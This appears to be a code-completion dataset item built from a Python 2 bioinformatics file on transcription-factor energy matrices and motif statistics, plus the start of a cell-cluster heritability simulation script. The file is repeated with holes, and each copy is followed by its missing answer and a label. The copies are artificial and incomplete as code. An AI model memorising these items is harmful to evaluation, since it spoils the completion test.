def specific_binding_fraction_plot(filename=None):
binding_fractions = map(specific_binding_fraction,verbose_gen(energy_matrices))
plt.scatter(ks,binding_fractions)
plt.xlabel("Copy Number")
plt.ylabel("Specific binding fraction")
plt.loglog()
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def max_16_ic(matrix,n=100000):
"""
Compute motif_ic of top 16 of n random sites
"""
width = len(matrix)
sites = [random_site(width) for i in xrange(n)]
scores = map(lambda site:score(matrix,site),sites)
top16 = map(first,sorted(zip(sites,scores),key=lambda(site,score):score)[:16])
return motif_ic(top16)
def matrix_as_psfm(matrix):
"""
convert energy to psfm, assuming uniform probabilities
DEPRECATED: INCOMPLETE
"""
return [[2**(ep-2) for ep in row] for row in matrix]
def | (matrix,n,G,alpha):
"""See blue notebook: 6/27/13"""
#constant which does not depend on sites, matrix
C = 1/beta * log(n/G*(1-alpha)/alpha)
Zb = predict_z(matrix,G)
omega = Zb/G
return C - (1/beta * log(omega))
def predict_zf(matrix,n,G,alpha):
"""Predict sum_{i=1}^n exp(-\beta*E(s))"""
ep_f = predict_site_energy(matrix,n,G,alpha)
return n*exp(-beta*ep_f)
C = 1/beta * (log(n/G*(1-alpha)/alpha) + L * log(4))
def site_error(matrix,site):
"""Compute error for site, given matrix"""
return (score(matrix,site,ns=False)
- C
+ 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)]))
def site_error_optimized(matrix,site):
"""Compute error for site, given matrix"""
return score(matrix,site,ns=False) - C
def sse(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
return sum([site_error(matrix,site)**2
for site in motif])
def sse_optimized(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
#Hoisted computation of K out of site_error
K = 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)])
return sum([(site_error_optimized(matrix,site)+K)**2
for site in motif])
def sse_experiment(motif):
"""Given a collection of sites, can we find a corresponding energy
matrix by gradient descent on sum of squared errors?"""
L = len(matrix)
n = len(motif)
G = 100000.0
alpha = 0.9
def partial_site_error(matrix,site,i,b):
return 2*site_error(matrix,site)*(int(site[i] == b)
- (exp(-beta*matrix[i][base_dict[b]])
/sum([exp(-beta*matrix[i][base_dict[c]])
for c in "ACGT"])))
def partial_sse(matrix,i,b):
return sum([2*site_error(matrix,site)*partial_site_error(matrix,site,i,b)
for site in motif])
def jacobian(matrix):
return [[partial_sse(matrix,i,b) for b in "ACGT"] for i in range(L)]
def grad_desc(matrix,max_its=1000):
step = 0.0001
tolerance = 0.001
current_sse = sse(matrix)
print current_sse
its = 0 # iterations
sses = []
while current_sse > tolerance and its < max_its:
j = jacobian(matrix)
#print j
matrix = matrix_add(matrix,matrix_scalar_mult(-step,j))
current_sse = sse(matrix)
print its,current_sse #,[score(matrix,site,ns=False) for site in motif]
#print matrix
its += 1
sses.append(current_sse)
return matrix,sses
print matrix,motif
return grad_desc([[0]*4 for i in range(L)])
def mutate_matrix(matrix):
"""Mutate the matrix by perturbing one weight by a standard normal"""
L = len(matrix)
r_i = random.randrange(L)
r_j = random.randrange(4)
r = random.gauss(0,1)
return [[matrix[i][j]+r*(i==r_i)*(j==r_j)
for j in range(4)] for i in range(L)]
def propose(matrix,motif):
"""Return a candidate (S,R) system by mutating either the motif or
the matrix"""
if random.random() < 0.5:
return matrix,mutate_motif(motif)
else:
return mutate_matrix(matrix),motif
def mh_experiment(text="",filename=None):
"""Metropolis-Hastings sampling for SSE of (S,R) systems"""
motif = [random_site(L) for i in range(n)]
matrix = [[0,0,0,0] for i in range(L)]
xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=50000)
sses = [sse_optimized(matrix,motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ginis = [motif_gini(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
plt.scatter(ics,sses)
plt.xlabel("Motif Information Content (bits)")
plt.ylabel("Sum Squared Error")
plt.title("Motif IC vs. Sum Squared error: %s " % text)
maybesave(filename)
def ic_vs_gini_scatterplot_exp(trials=100,stopping_crit=1,filename=None):
# redo this properly!
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
# xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
# lambda(matrix,motif):propose(matrix,motif),
# (matrix,motif),
# verbose=True,
# iterations=50000,every=100)
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda: anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
iterations=100000,
stopping_crit = stopping_crit*scale)
xs = [annealed_system() for i in verbose_gen(xrange(trials))]
ginis = [motif_gini(motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,
modulus=1000)]
sa_motifs = [sa_motif_with_desired_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
greedy_motifs = [generate_greedy_motif_with_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
sa_ics = [motif_ic(motif) for motif in sa_motifs]
sa_ginis = [motif_gini(motif) for motif in sa_motifs]
greedy_ics = [motif_ic(motif) for motif in greedy_motifs]
greedy_ginis = [motif_gini(motif) for motif in greedy_motifs]
plt.scatter(ics,ginis,color='b',label="Systems")
plt.scatter(sa_ics,sa_ginis,color='r',label="MCMC")
plt.scatter(greedy_ics,greedy_ginis,color='g',label="Greedy")
print "Systems vs. SA motifs:",wilcoxon(ginis,sa_ginis)
print "Systems vs. greedy motifs:",wilcoxon(ginis,greedy_ginis)
print "Greedy vs. sa motifs:",wilcoxon(sa_ginis,greedy_ginis)
# Systems vs. SA motifs: (75677.0, 2.1175931461637028e-81)
# Systems vs. greedy motifs: (78734.0, 1.2196302463732947e-78)
# Greedy vs. sa motifs: (247043.0, 0.72555385752004398)
maybesave(filename)
print "loaded energy_matrix_analysis"
def mr_pairs_have_less_mi_exp(filename=None):
"""Motifs evolved as M-R pairs have less MI than random motifs
with the same IC"""
trials = 500
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda :anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=100000,
stopping_crit = 0.1*scale)
systems = [annealed_system() for i in xrange(500)]
motifs = map(second,systems)
ics = map(motif_ic,motifs)
control_motifs = [sa_motif_with_desired_ic(ic,0.1,n,L) for ic in verbose_gen(ics)]
mis = map(total_motif_mi,motifs)
control_mis = map(total_motif_mi,control_motifs)
plt.scatter(mis,control_mis)
plt.xlabel("M-R System Mutual Information (bits)")
plt.ylabel("Annealed Motif Mutual Information (bits)")
plt.plot([0,5],[0,5])
maybesave(filename)
#mannwhitneyu(mis,control_mis) -> (47673.0, 1.2864021557444156e-64)
return mis,control_mis
| predict_site_energy | identifier_name |
energy_matrix_analysis.py | """
We wish to explore the relationship between copy number and various
energy matrix statistics, such as disorder (i.e. standard deviation of
score).
"""
from utils import *
from parse_energy_matrices import parse_energy_matrices
from scipy.stats import wilcoxon
#energy_matrices = parse_energy_matrices("energy_matrices.txt")
beta = 1.61
n = 16
G = 100000.0
alpha = 0.5
L = 10
ns_binding_const = -8
base_dict = {b:i for i,b in enumerate("ACGT")}
def score_ref(matrix,seq,ns=True):
"""Score a sequence with a motif. This is a reference
implementation. See score for production implementation"""
specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def score(matrix,seq,ns=True):
"""Score a sequence with a motif."""
#specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
specific_binding = 0
for i in xrange(len(matrix)):
specific_binding += matrix[i][base_dict[seq[i]]]
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
|
def matrix_mean(matrix):
"""Return the mean score for the energy matrix"""
return sum(map(mean,matrix))
def matrix_variance(matrix):
"""Return the variance of the scores for the energy matrix"""
return sum(map(lambda row:variance(row,correct=False),matrix))
def matrix_sd(matrix):
return sqrt(matrix_variance(matrix))
def specific_binding_fraction(matrix,n=10000):
"""What fraction of the time does the tf bind specifically (i.e. < -8kbt)
to a random site?"""
return mean([score(matrix,random_site(10)) < -8 for i in xrange(n)])
def predict_mean_prop(matrix,ns=True):
"""estimate <exp(-beta*score(matrix,site))>
ns: non-specific binding"""
return (product([mean([exp(-beta*ep) for ep in col]) for col in matrix]) +
(exp(-beta*(-8)) if ns else 0)) # kbT
def predict_variance_prop(matrix):
"""estimate Var(exp(-beta*score(matrix,site)))"""
# See: The Variance of the Product of K Random Variables
# Leo A. Goodman
# Page 55 of 54-60
# However, first line of equation 1 is /wrong/. Should be:
# product(e_of_sqs) - product(esqs), not sum...
# expectation of square
e_of_sqs = [mean([exp(-beta*ep)**2 for ep in col]) for col in matrix]
# square of expectation
esqs = [mean([exp(-beta*ep) for ep in col])**2 for col in matrix]
return product(e_of_sqs) - product(esqs)
def predict_z(matrix,num_sites,ns=True):
return predict_mean_prop(matrix,ns=ns) * num_sites
def predict_z_variance(matrix,num_sites):
return predict_variance_prop(matrix) * num_sites
def mean_variance_plot(filename=None):
means = map(matrix_mean,energy_matrices)
variances = map(matrix_variance,energy_matrices)
plt.scatter(ks,means,label="Mean")
plt.scatter(ks,variances,label="Variance",color='g')
mean_regression = lambda x:poly1d(polyfit(map(log,ks),means,1))(log(x))
variance_regression = lambda x:poly1d(polyfit(map(log,ks),variances,1))(log(x))
plt.plot(*pl(mean_regression,map(iota,range(1,65))))
plt.plot(*pl(variance_regression,map(iota,range(1,65))))
plt.semilogx()
plt.xlabel("Copy Number")
plt.ylabel("kBT,(kBT)^2")
plt.legend(loc=0)
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def specific_binding_fraction_plot(filename=None):
binding_fractions = map(specific_binding_fraction,verbose_gen(energy_matrices))
plt.scatter(ks,binding_fractions)
plt.xlabel("Copy Number")
plt.ylabel("Specific binding fraction")
plt.loglog()
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def max_16_ic(matrix,n=100000):
"""
Compute motif_ic of top 16 of n random sites
"""
width = len(matrix)
sites = [random_site(width) for i in xrange(n)]
scores = map(lambda site:score(matrix,site),sites)
top16 = map(first,sorted(zip(sites,scores),key=lambda(site,score):score)[:16])
return motif_ic(top16)
def matrix_as_psfm(matrix):
"""
convert energy to psfm, assuming uniform probabilities
DEPRECATED: INCOMPLETE
"""
return [[2**(ep-2) for ep in row] for row in matrix]
def predict_site_energy(matrix,n,G,alpha):
"""See blue notebook: 6/27/13"""
#constant which does not depend on sites, matrix
C = 1/beta * log(n/G*(1-alpha)/alpha)
Zb = predict_z(matrix,G)
omega = Zb/G
return C - (1/beta * log(omega))
def predict_zf(matrix,n,G,alpha):
"""Predict sum_{i=1}^n exp(-\beta*E(s))"""
ep_f = predict_site_energy(matrix,n,G,alpha)
return n*exp(-beta*ep_f)
C = 1/beta * (log(n/G*(1-alpha)/alpha) + L * log(4))
def site_error(matrix,site):
"""Compute error for site, given matrix"""
return (score(matrix,site,ns=False)
- C
+ 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)]))
def site_error_optimized(matrix,site):
"""Compute error for site, given matrix"""
return score(matrix,site,ns=False) - C
def sse(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
return sum([site_error(matrix,site)**2
for site in motif])
def sse_optimized(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
#Hoisted computation of K out of site_error
K = 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)])
return sum([(site_error_optimized(matrix,site)+K)**2
for site in motif])
def sse_experiment(motif):
"""Given a collection of sites, can we find a corresponding energy
matrix by gradient descent on sum of squared errors?"""
L = len(matrix)
n = len(motif)
G = 100000.0
alpha = 0.9
def partial_site_error(matrix,site,i,b):
return 2*site_error(matrix,site)*(int(site[i] == b)
- (exp(-beta*matrix[i][base_dict[b]])
/sum([exp(-beta*matrix[i][base_dict[c]])
for c in "ACGT"])))
def partial_sse(matrix,i,b):
return sum([2*site_error(matrix,site)*partial_site_error(matrix,site,i,b)
for site in motif])
def jacobian(matrix):
return [[partial_sse(matrix,i,b) for b in "ACGT"] for i in range(L)]
def grad_desc(matrix,max_its=1000):
step = 0.0001
tolerance = 0.001
current_sse = sse(matrix)
print current_sse
its = 0 # iterations
sses = []
while current_sse > tolerance and its < max_its:
j = jacobian(matrix)
#print j
matrix = matrix_add(matrix,matrix_scalar_mult(-step,j))
current_sse = sse(matrix)
print its,current_sse #,[score(matrix,site,ns=False) for site in motif]
#print matrix
its += 1
sses.append(current_sse)
return matrix,sses
print matrix,motif
return grad_desc([[0]*4 for i in range(L)])
def mutate_matrix(matrix):
"""Mutate the matrix by perturbing one weight by a standard normal"""
L = len(matrix)
r_i = random.randrange(L)
r_j = random.randrange(4)
r = random.gauss(0,1)
return [[matrix[i][j]+r*(i==r_i)*(j==r_j)
for j in range(4)] for i in range(L)]
def propose(matrix,motif):
"""Return a candidate (S,R) system by mutating either the motif or
the matrix"""
if random.random() < 0.5:
return matrix,mutate_motif(motif)
else:
return mutate_matrix(matrix),motif
def mh_experiment(text="",filename=None):
"""Metropolis-Hastings sampling for SSE of (S,R) systems"""
motif = [random_site(L) for i in range(n)]
matrix = [[0,0,0,0] for i in range(L)]
xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=50000)
sses = [sse_optimized(matrix,motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ginis = [motif_gini(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
plt.scatter(ics,sses)
plt.xlabel("Motif Information Content (bits)")
plt.ylabel("Sum Squared Error")
plt.title("Motif IC vs. Sum Squared error: %s " % text)
maybesave(filename)
def ic_vs_gini_scatterplot_exp(trials=100,stopping_crit=1,filename=None):
# redo this properly!
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
# xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
# lambda(matrix,motif):propose(matrix,motif),
# (matrix,motif),
# verbose=True,
# iterations=50000,every=100)
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda: anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
iterations=100000,
stopping_crit = stopping_crit*scale)
xs = [annealed_system() for i in verbose_gen(xrange(trials))]
ginis = [motif_gini(motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,
modulus=1000)]
sa_motifs = [sa_motif_with_desired_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
greedy_motifs = [generate_greedy_motif_with_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
sa_ics = [motif_ic(motif) for motif in sa_motifs]
sa_ginis = [motif_gini(motif) for motif in sa_motifs]
greedy_ics = [motif_ic(motif) for motif in greedy_motifs]
greedy_ginis = [motif_gini(motif) for motif in greedy_motifs]
plt.scatter(ics,ginis,color='b',label="Systems")
plt.scatter(sa_ics,sa_ginis,color='r',label="MCMC")
plt.scatter(greedy_ics,greedy_ginis,color='g',label="Greedy")
print "Systems vs. SA motifs:",wilcoxon(ginis,sa_ginis)
print "Systems vs. greedy motifs:",wilcoxon(ginis,greedy_ginis)
print "Greedy vs. sa motifs:",wilcoxon(sa_ginis,greedy_ginis)
# Systems vs. SA motifs: (75677.0, 2.1175931461637028e-81)
# Systems vs. greedy motifs: (78734.0, 1.2196302463732947e-78)
# Greedy vs. sa motifs: (247043.0, 0.72555385752004398)
maybesave(filename)
print "loaded energy_matrix_analysis"
def mr_pairs_have_less_mi_exp(filename=None):
"""Motifs evolved as M-R pairs have less MI than random motifs
with the same IC"""
trials = 500
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda :anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=100000,
stopping_crit = 0.1*scale)
systems = [annealed_system() for i in xrange(500)]
motifs = map(second,systems)
ics = map(motif_ic,motifs)
control_motifs = [sa_motif_with_desired_ic(ic,0.1,n,L) for ic in verbose_gen(ics)]
mis = map(total_motif_mi,motifs)
control_mis = map(total_motif_mi,control_motifs)
plt.scatter(mis,control_mis)
plt.xlabel("M-R System Mutual Information (bits)")
plt.ylabel("Annealed Motif Mutual Information (bits)")
plt.plot([0,5],[0,5])
maybesave(filename)
#mannwhitneyu(mis,control_mis) -> (47673.0, 1.2864021557444156e-64)
return mis,control_mis
| return specific_binding | conditional_block |
energy_matrix_analysis.py | """
We wish to explore the relationship between copy number and various
energy matrix statistics, such as disorder (i.e. standard deviation of
score).
"""
from utils import *
from parse_energy_matrices import parse_energy_matrices
from scipy.stats import wilcoxon
#energy_matrices = parse_energy_matrices("energy_matrices.txt")
beta = 1.61
n = 16
G = 100000.0
alpha = 0.5
L = 10
ns_binding_const = -8
base_dict = {b:i for i,b in enumerate("ACGT")}
def score_ref(matrix,seq,ns=True):
"""Score a sequence with a motif. This is a reference
implementation. See score for production implementation"""
specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def score(matrix,seq,ns=True):
"""Score a sequence with a motif."""
#specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
specific_binding = 0
for i in xrange(len(matrix)):
specific_binding += matrix[i][base_dict[seq[i]]]
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def matrix_mean(matrix):
"""Return the mean score for the energy matrix"""
return sum(map(mean,matrix))
def matrix_variance(matrix):
"""Return the variance of the scores for the energy matrix"""
return sum(map(lambda row:variance(row,correct=False),matrix))
def matrix_sd(matrix):
return sqrt(matrix_variance(matrix))
def specific_binding_fraction(matrix,n=10000):
"""What fraction of the time does the tf bind specifically (i.e. < -8kbt)
to a random site?"""
return mean([score(matrix,random_site(10)) < -8 for i in xrange(n)])
def predict_mean_prop(matrix,ns=True):
"""estimate <exp(-beta*score(matrix,site))>
ns: non-specific binding"""
return (product([mean([exp(-beta*ep) for ep in col]) for col in matrix]) +
(exp(-beta*(-8)) if ns else 0)) # kbT
def predict_variance_prop(matrix):
"""estimate Var(exp(-beta*score(matrix,site)))"""
# See: The Variance of the Product of K Random Variables
# Leo A. Goodman
# Page 55 of 54-60
# However, first line of equation 1 is /wrong/. Should be:
# product(e_of_sqs) - product(esqs), not sum...
# expectation of square
e_of_sqs = [mean([exp(-beta*ep)**2 for ep in col]) for col in matrix]
# square of expectation
esqs = [mean([exp(-beta*ep) for ep in col])**2 for col in matrix]
return product(e_of_sqs) - product(esqs)
def predict_z(matrix,num_sites,ns=True):
return predict_mean_prop(matrix,ns=ns) * num_sites
def predict_z_variance(matrix,num_sites):
return predict_variance_prop(matrix) * num_sites
def mean_variance_plot(filename=None):
means = map(matrix_mean,energy_matrices)
variances = map(matrix_variance,energy_matrices)
plt.scatter(ks,means,label="Mean")
plt.scatter(ks,variances,label="Variance",color='g')
mean_regression = lambda x:poly1d(polyfit(map(log,ks),means,1))(log(x))
variance_regression = lambda x:poly1d(polyfit(map(log,ks),variances,1))(log(x))
plt.plot(*pl(mean_regression,map(iota,range(1,65))))
plt.plot(*pl(variance_regression,map(iota,range(1,65))))
plt.semilogx()
plt.xlabel("Copy Number")
plt.ylabel("kBT,(kBT)^2")
plt.legend(loc=0)
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def specific_binding_fraction_plot(filename=None):
binding_fractions = map(specific_binding_fraction,verbose_gen(energy_matrices))
plt.scatter(ks,binding_fractions)
plt.xlabel("Copy Number")
plt.ylabel("Specific binding fraction")
plt.loglog()
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def max_16_ic(matrix,n=100000):
"""
Compute motif_ic of top 16 of n random sites
"""
width = len(matrix)
sites = [random_site(width) for i in xrange(n)]
scores = map(lambda site:score(matrix,site),sites)
top16 = map(first,sorted(zip(sites,scores),key=lambda(site,score):score)[:16])
return motif_ic(top16)
def matrix_as_psfm(matrix):
"""
convert energy to psfm, assuming uniform probabilities
DEPRECATED: INCOMPLETE
"""
return [[2**(ep-2) for ep in row] for row in matrix]
def predict_site_energy(matrix,n,G,alpha):
"""See blue notebook: 6/27/13"""
#constant which does not depend on sites, matrix
C = 1/beta * log(n/G*(1-alpha)/alpha)
Zb = predict_z(matrix,G)
omega = Zb/G
return C - (1/beta * log(omega))
def predict_zf(matrix,n,G,alpha):
"""Predict sum_{i=1}^n exp(-\beta*E(s))"""
ep_f = predict_site_energy(matrix,n,G,alpha)
return n*exp(-beta*ep_f)
C = 1/beta * (log(n/G*(1-alpha)/alpha) + L * log(4))
def site_error(matrix,site):
"""Compute error for site, given matrix"""
return (score(matrix,site,ns=False)
- C
+ 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)]))
def site_error_optimized(matrix,site):
|
def sse(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
return sum([site_error(matrix,site)**2
for site in motif])
def sse_optimized(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
#Hoisted computation of K out of site_error
K = 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)])
return sum([(site_error_optimized(matrix,site)+K)**2
for site in motif])
def sse_experiment(motif):
"""Given a collection of sites, can we find a corresponding energy
matrix by gradient descent on sum of squared errors?"""
L = len(matrix)
n = len(motif)
G = 100000.0
alpha = 0.9
def partial_site_error(matrix,site,i,b):
return 2*site_error(matrix,site)*(int(site[i] == b)
- (exp(-beta*matrix[i][base_dict[b]])
/sum([exp(-beta*matrix[i][base_dict[c]])
for c in "ACGT"])))
def partial_sse(matrix,i,b):
return sum([2*site_error(matrix,site)*partial_site_error(matrix,site,i,b)
for site in motif])
def jacobian(matrix):
return [[partial_sse(matrix,i,b) for b in "ACGT"] for i in range(L)]
def grad_desc(matrix,max_its=1000):
step = 0.0001
tolerance = 0.001
current_sse = sse(matrix)
print current_sse
its = 0 # iterations
sses = []
while current_sse > tolerance and its < max_its:
j = jacobian(matrix)
#print j
matrix = matrix_add(matrix,matrix_scalar_mult(-step,j))
current_sse = sse(matrix)
print its,current_sse #,[score(matrix,site,ns=False) for site in motif]
#print matrix
its += 1
sses.append(current_sse)
return matrix,sses
print matrix,motif
return grad_desc([[0]*4 for i in range(L)])
def mutate_matrix(matrix):
"""Mutate the matrix by perturbing one weight by a standard normal"""
L = len(matrix)
r_i = random.randrange(L)
r_j = random.randrange(4)
r = random.gauss(0,1)
return [[matrix[i][j]+r*(i==r_i)*(j==r_j)
for j in range(4)] for i in range(L)]
def propose(matrix,motif):
"""Return a candidate (S,R) system by mutating either the motif or
the matrix"""
if random.random() < 0.5:
return matrix,mutate_motif(motif)
else:
return mutate_matrix(matrix),motif
def mh_experiment(text="",filename=None):
"""Metropolis-Hastings sampling for SSE of (S,R) systems"""
motif = [random_site(L) for i in range(n)]
matrix = [[0,0,0,0] for i in range(L)]
xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=50000)
sses = [sse_optimized(matrix,motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ginis = [motif_gini(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
plt.scatter(ics,sses)
plt.xlabel("Motif Information Content (bits)")
plt.ylabel("Sum Squared Error")
plt.title("Motif IC vs. Sum Squared error: %s " % text)
maybesave(filename)
def ic_vs_gini_scatterplot_exp(trials=100,stopping_crit=1,filename=None):
# redo this properly!
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
# xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
# lambda(matrix,motif):propose(matrix,motif),
# (matrix,motif),
# verbose=True,
# iterations=50000,every=100)
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda: anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
iterations=100000,
stopping_crit = stopping_crit*scale)
xs = [annealed_system() for i in verbose_gen(xrange(trials))]
ginis = [motif_gini(motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,
modulus=1000)]
sa_motifs = [sa_motif_with_desired_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
greedy_motifs = [generate_greedy_motif_with_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
sa_ics = [motif_ic(motif) for motif in sa_motifs]
sa_ginis = [motif_gini(motif) for motif in sa_motifs]
greedy_ics = [motif_ic(motif) for motif in greedy_motifs]
greedy_ginis = [motif_gini(motif) for motif in greedy_motifs]
plt.scatter(ics,ginis,color='b',label="Systems")
plt.scatter(sa_ics,sa_ginis,color='r',label="MCMC")
plt.scatter(greedy_ics,greedy_ginis,color='g',label="Greedy")
print "Systems vs. SA motifs:",wilcoxon(ginis,sa_ginis)
print "Systems vs. greedy motifs:",wilcoxon(ginis,greedy_ginis)
print "Greedy vs. sa motifs:",wilcoxon(sa_ginis,greedy_ginis)
# Systems vs. SA motifs: (75677.0, 2.1175931461637028e-81)
# Systems vs. greedy motifs: (78734.0, 1.2196302463732947e-78)
# Greedy vs. sa motifs: (247043.0, 0.72555385752004398)
maybesave(filename)
print "loaded energy_matrix_analysis"
def mr_pairs_have_less_mi_exp(filename=None):
"""Motifs evolved as M-R pairs have less MI than random motifs
with the same IC"""
trials = 500
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda :anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=100000,
stopping_crit = 0.1*scale)
systems = [annealed_system() for i in xrange(500)]
motifs = map(second,systems)
ics = map(motif_ic,motifs)
control_motifs = [sa_motif_with_desired_ic(ic,0.1,n,L) for ic in verbose_gen(ics)]
mis = map(total_motif_mi,motifs)
control_mis = map(total_motif_mi,control_motifs)
plt.scatter(mis,control_mis)
plt.xlabel("M-R System Mutual Information (bits)")
plt.ylabel("Annealed Motif Mutual Information (bits)")
plt.plot([0,5],[0,5])
maybesave(filename)
#mannwhitneyu(mis,control_mis) -> (47673.0, 1.2864021557444156e-64)
return mis,control_mis
| """Compute error for site, given matrix"""
return score(matrix,site,ns=False) - C | identifier_body |
Script 1-relative heritability-plotted(Figure 2a)-2.py | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 06 10:26:07 2016
@author: Will Ratcliff
"""
import numpy as np
np.set_printoptions(threshold=np.nan)
import math
from scipy.stats import linregress
import matplotlib.pyplot as plt
import pandas as pd
cell_genos=np.linspace(1,2,10)
st_dev_cell=0.3
st_dev_group=0.25
timesteps_to_run=4 #this is equivalent to the number of generations the seed population of 10 clusters (each with a different genetic mean size) goes through.
number_of_stdevs=5 #this name is a bit confusing, but this is the number of different st_devs to be run in the iteration
replicates=10
#use these lists for running multiple iterations of cell and group stdevs
group_stdev_iterator=np.linspace(.0001,st_dev_cell,number_of_stdevs)
cell_stdev_iterator=np.linspace(.0001,st_dev_group,number_of_stdevs)
group_sizes=[]
st_dev_cells=[]
st_dev_groups=[]
slope_cell=[]
slope_group_volume=[]
slope_group_radius=[]
slope_group_settling=[]
stdev_list = [ [] for i in range(number_of_stdevs) ]
group_sizes_list = [ [] for i in range(len(cell_genos)) ]
gs=4 #is the number of cells per group from 2 to 32
"""So, here's how the population is initialized:
Col A: Cell ID (#)
Col B: Cell genetic size
Col C: Cellular phenotype
Col D: Cell parent
Col E: Cluster ID (#)
Col F: Cluster parent
Col G: empty
Col H: empty
Col I: empty
Col J: Cell parental phenotype"""
for ii in range(0,len(stdev_list)):
for a in np.arange(2,gs+2,2):
cluster_size=a
off_spring_std=a/3
for b in range(0,replicates):
pop=np.zeros((len(cell_genos)*cluster_size,replicates))
#print(np.shape(pop))
st_dev_cell=cell_stdev_iterator[ii] #change this to st_dev_group=group_stdev_iterator[ii] to iterate across group-level variance
#st_dev_group=group_stdev_iterator[ii]
#initialize the population
#for i in range(0,np.shape(pop)[0]):
for i in range(0,np.shape(pop)[0]):
pop[i][0]=i #ID each cell
pop[i][1]=cell_genos[math.floor(i/cluster_size)]
pop[i][2]=np.random.normal(pop[i][1],st_dev_cell)
pop[i][4]=math.floor(i/cluster_size)
timestep=1
#print(np.shape(pop))
pop1=pop
